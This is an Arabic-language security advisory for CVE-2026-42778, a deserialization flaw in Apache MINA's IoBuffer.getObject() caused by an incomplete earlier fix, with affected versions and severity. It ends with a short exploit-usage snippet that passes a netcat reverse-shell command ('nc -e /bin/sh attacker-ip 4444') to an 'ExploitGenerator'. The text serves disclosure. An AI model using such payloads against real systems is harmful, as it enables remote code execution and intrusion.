
CVE-2026-42778 EUVD-2026-26492 إلغاء تسلسل البيانات غير الموثوقة (CWE-502)
إصلاح غير مكتمل في طريقة AbstractIoBuffer.getObject() في Apache MINA. التحقق من قائمة أسماء الفئات المسموح بها والذي يقيّد الفئات التي يمكن إلغاء تسلسلها يتم تطبيقه بعد فوات الأوان، بعد أن تكون المُهيّئات الثابتة في الفئات التي يتم قراءتها قد نُفّذت بالفعل. يحدث هذا لأن الإصلاح الأصلي لـ CVE-2024-52046 لم يُطبَّق بشكل صحيح على فرعي 2.1.X و 2.2.X. الإصدارات المتأثرة: - Apache MINA 2.1.0 حتى 2.1.11 - Apache MINA 2.2.0 حتى 2.2.6
معرف CVE: CVE-2026-42778
تاريخ النشر: 05/01/2026
الأثر: حرج
توفر الاستغلال: غير عام، خاص فقط.
CVSS: 9.8
التصحيح متاح: (لا يوجد تصحيح رسمي بعد)
يمكن للمهاجم صياغة كائنات مُسلسلة خبيثة، عند معالجتها بواسطة IoBuffer.getObject()، تنفيذ تعليمات برمجية عشوائية من خلال المُهيّئات الثابتة قبل حدوث التحقق من قائمة أسماء الفئات المسموح بها. نظرًا لأن هذه ثغرة قابلة للوصول عبر الشبكة ولا تتطلب صلاحيات أو تفاعلًا من المستخدم، فإن تنفيذ التعليمات البرمجية عن بُعد ممكن لأي تطبيق يستخدم Apache MINA ويستدعي طريقة IoBuffer.getObject(). تسمح الثغرة بالاختراق الكامل لسرية وسلامة وتوافر الأنظمة المتأثرة.
# الترجمة والتوليد
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# الإرسال عبر الشبكة إلى خدمة قائمة على MINA باستخدام ObjectSerializationCodecFactory
# أو أي نقطة نهاية تستدعي IoBuffer.getObject()